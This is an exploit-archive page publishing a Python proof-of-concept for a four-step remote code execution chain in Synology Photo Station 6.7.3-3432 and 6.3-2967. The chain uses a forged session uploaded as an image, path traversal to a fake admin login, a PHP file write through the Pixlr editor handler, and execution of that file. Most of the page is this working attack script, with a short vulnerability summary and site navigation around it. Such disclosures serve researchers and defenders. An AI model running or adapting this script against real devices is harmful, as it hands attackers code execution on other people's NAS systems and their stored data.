Synology Photo Station 6.7.3-3432 / 6.3-2967 Remote Code Execution

Synology Photo Station 6.7.3-3432 / 6.3-2967 Remote Code Execution: Posted Aug 8, 2017; Authored by Kacper Szurek; Synology Photo Station versions 6.7.3-3432 and 6.3-2967 suffer from a code execution vulnerability.; tags | exploit, code execution; advisories | CVE-2017-11151, CVE-2017-11152, CVE-2017-11153, CVE-2017-11154, CVE-2017-11155; SHA-256 | aee069f51577df77fc6d3c899ca3c89aa1f4c3de9f2251ed8ac15f6a9b582141; Download | Favorite | View

Synology Photo Station 6.7.3-3432 / 6.3-2967 Remote Code Execution

'''
Source: https://blogs.securiteam.com/index.php/archives/3356
 
Vulnerability details
The remote code execution is a combination of 4 different vulnerabilities:
 
Upload arbitrary files to the specified directories
Log in with a fake authentication mechanism
Log in to Photo Station with any identity
Execute arbitrary code by authenticated user with administrator privileges
The chain of vulnerabilities will allow you, in the end, to execute code as:
 
uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
'''
import requests
 
# What server you want to attack
synology_ip = 'http://192.168.1.100'
 
# Your current IP
ip = '192.168.1.200'
 
# PHP code you want to execute
php_to_execute = '<?php echo system("id"); ?>'
 
encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'
 
print "[+] Set fake admin sesssion"
file = [('file', ('foo.jpg', encoded_session))]
 
r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)
print r.text
 
print "[+] Login as fake admin"
 
# Depends on version it might be stored in different dirs
payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}
 
try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)
 
whichact = {'action' : 'get_setting'}
r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
print r.text
 
print "[+] Upload php file"
 
c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}
r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
print r.text
 
 
print "[+] Execute payload"
f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))
 
print f.text

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Synology Photo Station 6.7.3-3432 / 6.3-2967 Remote Code Execution

Synology Photo Station 6.7.3-3432 / 6.3-2967 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Synology Photo Station 6.7.3-3432 / 6.3-2967 Remote Code Execution

Share This

Synology Photo Station 6.7.3-3432 / 6.3-2967 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems